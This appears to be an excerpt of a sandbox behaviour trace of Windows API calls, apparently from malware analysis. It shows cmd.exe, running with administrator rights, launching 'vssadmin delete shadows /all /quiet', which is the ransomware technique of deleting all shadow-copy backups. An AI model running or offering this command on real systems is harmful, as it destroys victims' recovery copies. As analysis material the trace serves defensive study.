(Heap=0x2e8a1bb0000, Flags=0x0, Ptr=0x2e8a1bc8fd0, Size=0x52) returned 0x2e8a1bc8fd0 [0046.816] GetProcessHeap () returned 0x2e8a1bb0000 [0046.817] RtlSizeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, MemoryPointer=0x2e8a1bc8fd0) returned 0x52 [0046.817] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0046.817] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.817] GetProcessHeap () returned 0x2e8a1bb0000 [0046.817] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x1bc) returned 0x2e8a1bb6c30 [0046.817] GetProcessHeap () returned 0x2e8a1bb0000 [0046.817] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x368) returned 0x2e8a1bc9040 [0046.824] GetProcessHeap () returned 0x2e8a1bb0000 [0046.824] RtlReAllocateHeap (Heap=0x2e8a1bb0000, Flags=0x0, Ptr=0x2e8a1bc9040, Size=0x1be) returned 0x2e8a1bc9040 [0046.824] GetProcessHeap () returned 0x2e8a1bb0000 [0046.824] RtlSizeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, MemoryPointer=0x2e8a1bc9040) returned 0x1be [0046.824] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.824] GetProcessHeap () returned 0x2e8a1bb0000 [0046.824] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0xe8) returned 0x2e8a1bb6e00 [0046.825] GetProcessHeap () returned 0x2e8a1bb0000 [0046.825] RtlReAllocateHeap (Heap=0x2e8a1bb0000, Flags=0x0, Ptr=0x2e8a1bb6e00, Size=0x7e) returned 0x2e8a1bb6e00 [0046.825] GetProcessHeap () returned 0x2e8a1bb0000 [0046.825] RtlSizeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, MemoryPointer=0x2e8a1bb6e00) returned 0x7e [0046.826] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.826] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0xf1b85aeb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf1b85aeb40) returned 0xffffffffffffffff [0046.826] GetLastError () returned 0x2 [0046.826] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.826] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0xf1b85aeb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf1b85aeb40) returned 0xffffffffffffffff [0046.828] GetLastError () returned 0x2 [0046.828] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.828] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0xf1b85aeb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf1b85aeb40) returned 0x2e8a1bb6e90 [0046.828] GetProcessHeap () returned 0x2e8a1bb0000 [0046.828] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, Size=0x28) returned 0x2e8a1bb6ef0 [0046.828] FindClose (in: hFindFile=0x2e8a1bb6e90 | out: hFindFile=0x2e8a1bb6e90) returned 1 [0046.829] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0xf1b85aeb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf1b85aeb40) returned 0xffffffffffffffff [0046.829] GetLastError () returned 0x2 [0046.829] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0xf1b85aeb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf1b85aeb40) returned 0x2e8a1bb6e90 [0046.829] GetProcessHeap () returned 0x2e8a1bb0000 [0046.829] RtlReAllocateHeap (Heap=0x2e8a1bb0000, Flags=0x0, Ptr=0x2e8a1bb6ef0, Size=0x8) returned 0x2e8a1bb6ef0 [0046.829] FindClose (in: hFindFile=0x2e8a1bb6e90 | out: hFindFile=0x2e8a1bb6e90) returned 1 [0046.829] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0046.829] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0046.829] ??_V@YAXPEAX@Z () returned 0x1 [0046.829] GetConsoleTitleW (in: lpConsoleTitle=0xf1b85af0c0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0047.289] GetProcessHeap () returned 0x2e8a1bb0000 [0047.289] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x21c) returned 0x2e8a1bc9210 [0047.289] GetConsoleTitleW (in: lpConsoleTitle=0x2e8a1bc9220, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0047.695] GetProcessHeap () returned 0x2e8a1bb0000 [0047.695] RtlReAllocateHeap (Heap=0x2e8a1bb0000, Flags=0x0, Ptr=0x2e8a1bc9210, Size=0xc2) returned 0x2e8a1bc9210 [0047.695] GetProcessHeap () returned 0x2e8a1bb0000 [0047.695] RtlSizeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, MemoryPointer=0x2e8a1bc9210) returned 0xc2 [0047.695] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0048.135] GetProcessHeap () returned 0x2e8a1bb0000 [0048.143] RtlFreeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, BaseAddress=0x2e8a1bc9210) returned 1 [0048.149] InitializeProcThreadAttributeList (in: lpAttributeList=0xf1b85aefe0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xf1b85aeed0 | out: lpAttributeList=0xf1b85aefe0, lpSize=0xf1b85aeed0) returned 1 [0048.149] UpdateProcThreadAttribute (in: lpAttributeList=0xf1b85aefe0, dwFlags=0x0, Attribute=0x60001, lpValue=0xf1b85aeebc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xf1b85aefe0, lpPreviousValue=0x0) returned 1 [0048.169] GetStartupInfoW (in: lpStartupInfo=0xf1b85aef70 | out: lpStartupInfo=0xf1b85aef70*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x27c, hStdOutput=0x288, hStdError=0x288)) [0048.169] GetProcessHeap () returned 0x2e8a1bb0000 [0048.169] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x20) returned 0x2e8a1bb6e90 [0048.169] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0048.169] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0048.169] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0048.169] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0048.170] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0048.170] GetProcessHeap () returned 0x2e8a1bb0000 [0048.170] RtlFreeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, BaseAddress=0x2e8a1bb6e90) returned 1 [0048.170] GetProcessHeap () returned 0x2e8a1bb0000 [0048.170] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x12) returned 0x2e8a1bb6f10 [0048.170] _get_osfhandle (_FileHandle=1) returned 0x288 [0048.170] SetConsoleMode (hConsoleHandle=0x288, dwMode=0x0) returned 0 [0048.170] _get_osfhandle (_FileHandle=0) returned 0x27c [0048.171] SetConsoleMode (hConsoleHandle=0x27c, dwMode=0x0) returned 0 [0048.171] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xf1b85aef00*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf1b85aeed8 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0xf1b85aeed8*(hProcess=0x98, hThread=0x94, dwProcessId=0xf68, dwThreadId=0xf98)) returned 1 [0049.048] CloseHandle (hObject=0x94) returned 1 [0049.049] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0049.049] GetProcessHeap () returned 0x2e8a1bb0000 [0049.049] RtlFreeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, BaseAddress=0x2e8a1bb8500) returned 1 [0049.049] GetEnvironmentStringsW () returned 0x2e8a1bb84e0* [0049.049] GetProcessHeap () returned 0x2e8a1bb0000 [0049.049] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0xacc) returned 0x2e8a1bc9530 [0049.049] FreeEnvironmentStringsA (penv="=") returned 1 [0049.049] LoadLibraryExW (lpLibFileName="NTDLL.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff931f40000 [0049.049] GetProcAddress (hModule=0x7ff931f40000, lpProcName="NtQueryInformationProcess") returned 0x7ff931fe56b0 [0049.049] NtQueryInformationProcess (in: ProcessHandle=0x98, ProcessInformationClass=0x0, ProcessInformation=0xf1b85ae3d8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xf1b85ae3d8, ReturnLength=0x0) returned 0x0 [0049.049] ReadProcessMemory (in: hProcess=0x98, lpBaseAddress=0xf48facd000, lpBuffer=0xf1b85ae410, nSize=0x7a0, lpNumberOfBytesRead=0xf1b85ae3d0 | out: lpBuffer=0xf1b85ae410*, lpNumberOfBytesRead=0xf1b85ae3d0*=0x7a0) returned 1 [0049.050] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) Thread: id = 25 os_tid = 0x838 Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x462a000" os_pid = "0x3d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xc48" cmd_line = "\"C:\\WINDOWS\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13 os_tid = 0xf7c [0043.789] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6d1a90000 [0043.789] __set_app_type (_Type=0x1) [0043.789] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6d1aa6d00) returned 0x0 [0043.789] __getmainargs (in: _Argc=0x7ff6d1ac9200, _Argv=0x7ff6d1ac9208, _Env=0x7ff6d1ac9210, _DoWildCard=0, _StartInfo=0x7ff6d1ac921c | out: _Argc=0x7ff6d1ac9200, _Argv=0x7ff6d1ac9208, _Env=0x7ff6d1ac9210) returned 0 [0043.790] _onexit (_Func=0x7ff6d1aa7fd0) returned 0x7ff6d1aa7fd0 [0043.790] _onexit (_Func=0x7ff6d1aa7fe0) returned 0x7ff6d1aa7fe0 [0043.790] _onexit (_Func=0x7ff6d1aa7ff0) returned 0x7ff6d1aa7ff0 [0043.790] _onexit (_Func=0x7ff6d1aa8000) returned 0x7ff6d1aa8000 [0043.790] _onexit (_Func=0x7ff6d1aa8010) returned 0x7ff6d1aa8010 [0043.790] _onexit (_Func=0x7ff6d1aa8020) returned 0x7ff6d1aa8020 [0043.791] GetCurrentThreadId () returned 0xf7c [0043.791] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf7c) returned 0x70 [0043.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff92fdd0000 [0043.791] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="SetThreadUILanguage") returned 0x7ff92fdea990 [0043.791] SetThreadUILanguage (LangId=0x0) returned 0x409 [0043.865] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0043.865] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd04cffc58 | out: phkResult=0xdd04cffc58*=0x0) returned 0x2 [0043.866] VirtualQuery (in: lpAddress=0xdd04cffc44, lpBuffer=0xdd04cffbc0, dwLength=0x30 | out: lpBuffer=0xdd04cffbc0*(BaseAddress=0xdd04cff000, AllocationBase=0xdd04c00000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.866] VirtualQuery (in: lpAddress=0xdd04c00000, lpBuffer=0xdd04cffbc0, dwLength=0x30 | out: lpBuffer=0xdd04cffbc0*(BaseAddress=0xdd04c00000, AllocationBase=0xdd04c00000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.866] VirtualQuery (in: lpAddress=0xdd04c01000, lpBuffer=0xdd04cffbc0, dwLength=0x30 | out: lpBuffer=0xdd04cffbc0*(BaseAddress=0xdd04c01000, AllocationBase=0xdd04c00000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.866] VirtualQuery (in: lpAddress=0xdd04c04000, lpBuffer=0xdd04cffbc0, dwLength=0x30 | out: lpBuffer=0xdd04cffbc0*(BaseAddress=0xdd04c04000, AllocationBase=0xdd04c00000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.866] VirtualQuery (in: lpAddress=0xdd04d00000, lpBuffer=0xdd04cffbc0, dwLength=0x30 | out: lpBuffer=0xdd04cffbc0*(BaseAddress=0xdd04d00000, AllocationBase=0xdd04d00000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.866] GetConsoleOutputCP () returned 0x1b5 [0043.972] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6d1acfbb0 | out: lpCPInfo=0x7ff6d1acfbb0) returned 1 [0043.983] SetConsoleCtrlHandler (HandlerRoutine=0x7ff6d1ab8150, Add=1) returned 1 [0043.987] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0043.987] GetConsoleMode (in: hConsoleHandle=0x2b0, lpMode=0x7ff6d1acfc04 | out: lpMode=0x7ff6d1acfc04) returned 0 [0043.992] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0043.992] GetConsoleMode (in: hConsoleHandle=0x2a4, lpMode=0x7ff6d1acfc00 | out: lpMode=0x7ff6d1acfc00) returned 0 [0043.992] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0043.994] SetConsoleMode (hConsoleHandle=0x2b0, dwMode=0x0) returned 0 [0043.998] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0043.998] GetConsoleMode (in: hConsoleHandle=0x2b0, lpMode=0x7ff6d1acfc08 | out: lpMode=0x7ff6d1acfc08) returned 0 [0043.999] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0043.999] GetConsoleMode (in: hConsoleHandle=0x2a4, lpMode=0x7ff6d1acfc0c | out: lpMode=0x7ff6d1acfc0c) returned 0 [0044.004] GetEnvironmentStringsW () returned 0x231f2445a10* [0044.004] GetProcessHeap () returned 0x231f2440000 [0044.004] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0xa7c) returned 0x231f24464a0 [0044.004] FreeEnvironmentStringsA (penv="A") returned 1 [0044.004] GetProcessHeap () returned 0x231f2440000 [0044.004] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x8) returned 0x231f2446f30 [0044.004] GetEnvironmentStringsW () returned 0x231f2445a10* [0044.004] GetProcessHeap () returned 0x231f2440000 [0044.004] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0xa7c) returned 0x231f2446f50 [0044.004] FreeEnvironmentStringsA (penv="A") returned 1 [0044.004] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xdd04cfeb08 | out: phkResult=0xdd04cfeb08*=0x7c) returned 0x0 [0044.004] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x0, lpData=0xdd04cfeb20*=0x4, lpcbData=0xdd04cfeb04*=0x1000) returned 0x2 [0044.004] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x4, lpData=0xdd04cfeb20*=0x1, lpcbData=0xdd04cfeb04*=0x4) returned 0x0 [0044.004] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x0, lpData=0xdd04cfeb20*=0x1, lpcbData=0xdd04cfeb04*=0x1000) returned 0x2 [0044.004] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x4, lpData=0xdd04cfeb20*=0x0, lpcbData=0xdd04cfeb04*=0x4) returned 0x0 [0044.005] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x4, lpData=0xdd04cfeb20*=0x40, lpcbData=0xdd04cfeb04*=0x4) returned 0x0 [0044.005] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x4, lpData=0xdd04cfeb20*=0x40, lpcbData=0xdd04cfeb04*=0x4) returned 0x0 [0044.005] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x0, lpData=0xdd04cfeb20*=0x40, lpcbData=0xdd04cfeb04*=0x1000) returned 0x2 [0044.005] RegCloseKey (hKey=0x7c) returned 0x0 [0044.005] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xdd04cfeb08 | out: phkResult=0xdd04cfeb08*=0x7c) returned 0x0 [0044.005] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x0, lpData=0xdd04cfeb20*=0x40, lpcbData=0xdd04cfeb04*=0x1000) returned 0x2 [0044.005] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x4, lpData=0xdd04cfeb20*=0x1, lpcbData=0xdd04cfeb04*=0x4) returned 0x0 [0044.005] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x0, lpData=0xdd04cfeb20*=0x1, lpcbData=0xdd04cfeb04*=0x1000) returned 0x2 [0044.005] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x4, lpData=0xdd04cfeb20*=0x0, lpcbData=0xdd04cfeb04*=0x4) returned 0x0 [0044.005] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x4, lpData=0xdd04cfeb20*=0x9, lpcbData=0xdd04cfeb04*=0x4) returned 0x0 [0044.005] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x4, lpData=0xdd04cfeb20*=0x9, lpcbData=0xdd04cfeb04*=0x4) returned 0x0 [0044.005] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0xdd04cfeb00, lpData=0xdd04cfeb20, lpcbData=0xdd04cfeb04*=0x1000 | out: lpType=0xdd04cfeb00*=0x0, lpData=0xdd04cfeb20*=0x9, lpcbData=0xdd04cfeb04*=0x1000) returned 0x2 [0044.005] RegCloseKey (hKey=0x7c) returned 0x0 [0044.005] time (in: timer=0x0 | out: timer=0x0) returned 0x5d1e39e6 [0044.005] srand (_Seed=0x5d1e39e6) [0044.005] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0044.005] malloc (_Size=0x4000) returned 0x231f26154f0 [0044.005] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0044.006] malloc (_Size=0xffce) returned 0x231f2620080 [0044.006] ??_V@YAXPEAX@Z () returned 0x231f2620080 [0044.006] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x231f2620080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0044.006] malloc (_Size=0xffce) returned 0x231f2630060 [0044.007] ??_V@YAXPEAX@Z () returned 0x231f2630060 [0044.007] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x231f2630060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0044.007] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0044.007] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.007] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0044.008] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0044.008] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0044.008] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0044.008] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0044.008] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 